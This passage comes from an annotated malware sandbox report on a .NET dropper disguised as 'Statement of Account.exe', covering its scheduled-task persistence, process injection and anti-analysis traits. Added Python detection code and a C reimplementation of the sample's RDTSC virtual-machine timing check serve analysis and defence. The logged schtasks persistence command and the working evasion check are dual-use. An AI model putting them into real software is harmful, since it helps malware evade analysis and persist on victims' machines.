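    """True when the concatenated method names of one class look machine-generated."""
    return shannon_entropy("".join(names)) >= threshold


# Constructed byte samples (not bytes taken from the analysed file).
ALL_BYTE_VALUES = bytes(range(256))            # every value once: exactly 8.0 bits/byte
ZERO_PADDING = b"\x00" * 4096                  # one symbol: 0.0 bits/byte
ASCII_TEXT = b"Ordinary ASCII text, like a string table in a .NET binary. " * 64

# Method names exactly as the report lists them for class BFaMK2EQJcYgGTNiOi.cs.
OBFUSCATED_METHODS = ['CVPayjNheF', 'xtZaJxdqj9', 'TijaEsb4NM', 'GCyajNj97q', 'V6Ta1YnOvi',
                      'eSIauwLTNp', 'UryaKVBgjf', 'O45aL0l7Yq', 'W3maGAc0Gf', 'etca8hQhFE']
# Constructed names of the kind found in an unobfuscated WinForms class.
READABLE_METHODS = ['Dispose', 'InitializeComponent', 'ProcessDialogKey', 'ToString',
                    'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnLoad', 'OnClick',
                    'GetHashCode']


if __name__ == "__main__":
    for label, sample in (("all byte values", ALL_BYTE_VALUES), ("zero padding", ZERO_PADDING),
                          ("ascii text", ASCII_TEXT)):
        print(f"{label:16s} {shannon_entropy(sample):.3f} bits/byte "
              f"packed={section_looks_packed(sample)}")
    for label, names in (("obfuscated", OBFUSCATED_METHODS), ("readable", READABLE_METHODS)):
        print(f"{label:16s} {shannon_entropy(''.join(names)):.3f} bits/char "
              f"obfuscated={method_names_look_obfuscated(names)}")
```

One caveat visible in the report's own lists: overrides such as 'Dispose', 'ToString', 'ProcessDialogKey' and 'CanConvertFrom' survive among the generated names because the obfuscator cannot rename members that implement a base-class or interface contract. A class with many such members can fall below a per-class threshold, so the heuristic is scored per class and weighed across the whole assembly, as the report does, rather than decided on one list.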

          Persistence and Installation Behavior

          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exe File created: C:\Users\user\AppData\Roaming\SIZfuXT.exe

          Boot Survival

          Source: C:\Users\user\Desktop\Statement of Account.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"
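The record above is the persistence step: the sample registers a scheduled task named Updates\SIZfuXT from an XML definition it first wrote to a .tmp file under the user's Temp directory, the behaviour the "Scheduled temp file as task from temp location" Sigma hit in the signature list refers to. Two details matter for anyone turning this into a detection. First, the image is recorded as C:\Windows\SysWOW64\schtasks.exe while the command line names C:\Windows\System32\schtasks.exe: the 32-bit parent is subject to WOW64 file-system redirection, so a rule that matches the full System32 path against the image field misses this event; match on the file name. Second, the parent is a program running from the user's Desktop, not an installer or an admin shell. The Python below is an added example, not part of the report or of any Sigma rule's text, that runs both checks over constructed process-creation records (field names modelled on Sysmon event 1 are assumptions, as are the temp-path and user-area regexes and the two benign events added for contrast).

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcessEvent:
    """Minimal process-creation record; field names assumed, modelled on Sysmon event 1."""
    parent_image: str
    image: str
    command_line: str


# Constructed events built from the process tree the report shows, plus two benign
# schtasks invocations for contrast. Not exported sandbox data.
EVENTS = [
    ProcessEvent(
        parent_image=r"C:\Users\user\Desktop\Statement of Account.exe",
        # The 32-bit parent sees System32 redirected to SysWOW64: Image records the real
        # path, the command line the requested one. Match on the file name, not the directory.
        image=r"C:\Windows\SysWOW64\schtasks.exe",
        command_line=r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" '
                     r'/XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"',
    ),
    ProcessEvent(  # benign: task imported from a persistent, non-temp XML
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\schtasks.exe",
        command_line=r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
    ),
    ProcessEvent(  # benign: task defined inline with /TR, no XML at all
        parent_image=r"C:\Windows\System32\cmd.exe",
        image=r"C:\Windows\System32\schtasks.exe",
        command_line=r'schtasks /Create /SC DAILY /TN "Maint\Cleanup" /TR "C:\Tools\cleanup.exe"',
    ),
]

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.IGNORECASE)


def tokenize(command_line: str) -> List[str]:
    """Split a Windows command line: double-quoted runs stay one argument, quotes are dropped."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', command_line)]


def schtasks_args(event: ProcessEvent) -> Dict[str, str]:
    """Return {'/flag': value} for schtasks.exe invocations ('' for bare flags), else {}."""
    if ntpath.basename(event.image).lower() != "schtasks.exe":
        return {}
    tokens = tokenize(event.command_line)[1:]  # drop the program path
    args: Dict[str, str] = {}
    i = 0
    while i < len(tokens):
        flag = tokens[i]
        if not flag.startswith("/"):
            i += 1
            continue
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
        args[flag.lower()] = tokens[i + 1] if has_value else ""
        i += 2 if has_value else 1
    return args


def task_registered_from_temp_xml(event: ProcessEvent) -> bool:
    """schtasks /Create whose task definition (/XML) is read from a temp directory."""
    args = schtasks_args(event)
    xml_path = args.get("/xml", "")
    return "/create" in args and bool(xml_path) and TEMP_DIR_RE.search(xml_path) is not None


def task_registered_by_user_area_parent(event: ProcessEvent) -> bool:
    """schtasks /Create launched by a program running from Desktop, Downloads or AppData."""
    return "/create" in schtasks_args(event) and USER_WRITABLE_RE.search(event.parent_image) is not None


def triage(events: List[ProcessEvent]) -> List[str]:
    """Command lines that trip either check."""
    return [e.command_line for e in events
            if task_registered_from_temp_xml(e) or task_registered_by_user_area_parent(e)]


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print("suspicious:", hit)
```

In an investigation the task name and XML path from the parsed arguments are the pivots: the task definition itself names the action, which for this sample is the dropped C:\Users\user\AppData\Roaming\SIZfuXT.exe, and the tmp file is gone by the time anyone looks, so the scheduled-task creation event and the registered task are what remain.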

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 occurrences)
          Source: C:\Users\user\Desktop\Statement of Account.exe Process information set: NOOPENFILEERRORBOX (44 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (84 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Process information set: NOOPENFILEERRORBOX (repeated 40 times)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: Statement of Account.exe PID: 6684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SIZfuXT.exe PID: 4176, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | API/Special instruction interceptor: Addresses: 7FFE2220D324, 7FFE22210774, 7FFE22210154, 7FFE2220D8A4, 7FFE2220DA44, 7FFE2220D1E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE | API/Special instruction interceptor: Addresses: 7FFE2220D324, 7FFE22210774, 7FFE2220D944, 7FFE2220D504, 7FFE2220D544, 7FFE2220D1E4, 7FFE22210154, 7FFE2220D8A4, 7FFE2220DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | RDTSC instruction interceptor: First address: 409904, second address: 40990A; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | RDTSC instruction interceptor: First address: 409B6E, second address: 409B74; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 3089904, second address: 308990A; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE | RDTSC instruction interceptor: First address: 3089B6E, second address: 3089B74; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 809904, second address: 80990A; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 809B6E, second address: 809B74; instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Note: the two RDTSC sites sit at the same offsets (+9904/+990A and +9B6E/+9B74) from three different image bases (0x400000 in vbc.exe, 0x3080000 in NETSTAT.EXE, 0x800000 in ipconfig.exe), which is consistent with one injected payload executing in three host processes rather than three separate pieces of code.
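The intercepted sequence (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc) keeps the low 32 bits of one timestamp read and immediately reads again. The usual next step, not visible in the captured bytes, is to compare the difference against a hard-coded limit: when a hypervisor traps RDTSC or a sandbox hooks it (as the "RDTSC instruction interceptor" above does), two back-to-back reads are far further apart than on bare metal. The following C program is an added example written for this page, not code from the sample or from Joe Sandbox; the 1000-cycle threshold and the sample count are assumptions for illustration. It uses the real timestamp counter on x86 (GCC/Clang) and falls back to a monotonic clock elsewhere so the logic still runs.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* Same time source the sample uses: the CPU timestamp counter (RDTSC). */
static uint64_t read_counter(void) { return __rdtsc(); }
#else
#include <time.h>
/* Fallback for non-x86 hosts so the logic below still compiles and runs;
 * units are then nanoseconds instead of cycles. */
static uint64_t read_counter(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#endif

/* One probe, mirroring the intercepted instruction sequence:
 *   rdtsc          ; first read, low 32 bits in EAX
 *   xor ecx, ecx
 *   add ecx, eax   ; keep the low 32 bits of the first read in ECX
 *   rdtsc          ; second read
 * Only the low 32 bits are kept, so the delta is computed in 32-bit
 * arithmetic exactly as the sample would; unsigned wrap-around is intended. */
uint32_t rdtsc_probe(void) {
    uint32_t first = (uint32_t)read_counter();
    uint32_t second = (uint32_t)read_counter();
    return second - first;
}

/* Smallest delta over several probes. Preemption and cache misses can only
 * make a probe slower, so the minimum is the cleanest per-read cost estimate. */
uint32_t min_probe_delta(unsigned samples) {
    uint32_t best = UINT32_MAX;
    for (unsigned i = 0; i < samples; i++) {
        uint32_t d = rdtsc_probe();
        if (d < best) best = d;
    }
    return best;
}

/* The decision such code makes: a delta above the limit is read as
 * "RDTSC is trapped or slowed, so this is probably a VM or an instrumented run". */
bool looks_instrumented(uint32_t delta, uint32_t threshold_cycles) {
    return delta > threshold_cycles;
}

/* Assumed threshold for illustration; real samples hard-code their own value. */
#define ASSUMED_THRESHOLD_CYCLES 1000u

int main(void) {
    uint32_t d = min_probe_delta(64);
    printf("min back-to-back counter delta: %u\n", d);
    printf("verdict: %s\n",
           looks_instrumented(d, ASSUMED_THRESHOLD_CYCLES)
               ? "instrumented or virtualised (by this heuristic)"
               : "looks like bare metal (by this heuristic)");
    return 0;
}
```

The heuristic is noisy in both directions: most current hypervisors pass RDTSC through without trapping, so a VM can pass it, while a busy physical host can fail it. That is why sandboxes intercept the instruction itself rather than trying to make the timing look right, and why the sequence is a better static hunting signature than a reliable runtime tell.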
Source: C:\Users\user\Desktop\Statement of Account.exe | Memory allocated (memory reserve | memory write watch) at: 13E0000, 2FB0000, 15D0000, 9400000, A400000, A610000, B610000
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Memory allocated (memory reserve | memory write watch) at: 1710000, 3270000, 3070000, 91E0000, A1E0000, A3E0000, B3E0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_00409AA0 rdtsc
Source: C:\Users\user\Desktop\Statement of Account.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Thread delayed: delay time: 922337203685477
Note: 922337203685477 is Int64.MaxValue (9223372036854775807 in 100 ns ticks) divided by 10000, so these are indefinite waits rather than a chosen sleep interval; Statement of Account.exe and SIZfuXT.exe appear again below with the matching negative sleep time.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7796
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1722
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 393
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 9551
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 885
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 866
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Window / User API: threadDelayed 3741
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Window / User API: threadDelayed 6230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | API coverage: 1.7 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | API coverage: 1.4 %
Source: C:\Users\user\Desktop\Statement of Account.exe TID: 6768 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\explorer.exe TID: 6744 | Thread sleep count: 393 > 30
Source: C:\Windows\explorer.exe TID: 6744 | Thread sleep time: -786000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6744 | Thread sleep count: 9551 > 30
Source: C:\Windows\explorer.exe TID: 6744 | Thread sleep time: -19102000s >= -30000s
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe TID: 4484 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160 | Thread sleep count: 3741 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160 | Thread sleep time: -7482000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160 | Thread sleep count: 6230 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7160 | Thread sleep time: -12460000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 entries)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Last function: Thread delayed (2 entries)
Source: explorer.exe, 00000007.00000002.4171986519.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000002.4171222123.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000007.00000002.4168419021.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000007.00000002.4171986519.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000007.00000003.3106013132.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.1738610372.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000007.00000002.4171222123.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000007.00000002.4171222123.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4171222123.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000003.3106013132.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000002.4168419021.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1738610372.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000000.1743570907.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Note: every one of these strings was found in explorer.exe memory and is a device or driver name of the analysis VM itself (VMware virtual disk and SATA CD-ROM, Hyper-V RAW). They show that the environment was identifiable to code running in that process; on their own they do not show that the sample looked for them.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process queried: DebugPort (2 entries)
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_00409AA0 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 6_2_0040ACE0 LdrLoadDll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: mov eax, dword ptr fs:[00000030h] (fs:[30h] is the PEB pointer in the 32-bit TEB; reading it is the usual prelude to checking PEB.BeingDebugged or NtGlobalFlag, or to walking the loader module list to resolve APIs without an import table). Functions, with the number of such reads in each: 6_2_05C7E5CF (2), 6_2_05C465D0 (1), 6_2_05C7A5D0 (2), 6_2_05C6E5E7 (8), 6_2_05C425E0 (1), 6_2_05C7C5ED (2), 6_2_05C42582 (1), 6_2_05C74588 (1), 6_2_05C7E59C (1), 6_2_05CC05A7 (3), 6_2_05C645B1 (2), 6_2_05C48550 (2), 6_2_05C7656A (3), 6_2_05CD6500 (1), 6_2_05D14500 (7), 6_2_05C50535 (6), 6_2_05C6E53E (5), 6_2_05CFA49A (1), 6_2_05C464AB (1), 6_2_05CCA4B0 (1), 6_2_05C7E443 (8), 6_2_05CFA456 (1), 6_2_05C6245A (1), 6_2_05C3645D (1), 6_2_05C6A470 (3), 6_2_05C78402 (3), 6_2_05C3E420 (3), 6_2_05C3C427 (1), 6_2_05CC6420 (6)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: mov ecx, dword ptr fs:[00000030h] in 6_2_05C42582 (1), 6_2_05C404E5 (1), 6_2_05C744B0 (1), 6_2_05CCC460 (1)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC6420 mov eax, dword ptr fs:[00000030h]6_2_05CC6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4C7C0 mov eax, dword ptr fs:[00000030h]6_2_05C4C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC07C3 mov eax, dword ptr fs:[00000030h]6_2_05CC07C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C627ED mov eax, dword ptr fs:[00000030h]6_2_05C627ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C627ED mov eax, dword ptr fs:[00000030h]6_2_05C627ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C627ED mov eax, dword ptr fs:[00000030h]6_2_05C627ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCE7E1 mov eax, dword ptr fs:[00000030h]6_2_05CCE7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C447FB mov eax, dword ptr fs:[00000030h]6_2_05C447FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C447FB mov eax, dword ptr fs:[00000030h]6_2_05C447FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE678E mov eax, dword ptr fs:[00000030h]6_2_05CE678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C407AF mov eax, dword ptr fs:[00000030h]6_2_05C407AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF47A0 mov eax, dword ptr fs:[00000030h]6_2_05CF47A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7674D mov esi, dword ptr fs:[00000030h]6_2_05C7674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7674D mov eax, dword ptr fs:[00000030h]6_2_05C7674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7674D mov eax, dword ptr fs:[00000030h]6_2_05C7674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCE75D mov eax, dword ptr fs:[00000030h]6_2_05CCE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40750 mov eax, dword ptr fs:[00000030h]6_2_05C40750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82750 mov eax, dword ptr fs:[00000030h]6_2_05C82750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C82750 mov eax, dword ptr fs:[00000030h]6_2_05C82750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4755 mov eax, dword ptr fs:[00000030h]6_2_05CC4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C48770 mov eax, dword ptr fs:[00000030h]6_2_05C48770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50770 mov eax, dword ptr fs:[00000030h]6_2_05C50770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C700 mov eax, dword ptr fs:[00000030h]6_2_05C7C700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40710 mov eax, dword ptr fs:[00000030h]6_2_05C40710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C70710 mov eax, dword ptr fs:[00000030h]6_2_05C70710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C720 mov eax, dword ptr fs:[00000030h]6_2_05C7C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7C720 mov eax, dword ptr fs:[00000030h]6_2_05C7C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBC730 mov eax, dword ptr fs:[00000030h]6_2_05CBC730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7273C mov eax, dword ptr fs:[00000030h]6_2_05C7273C
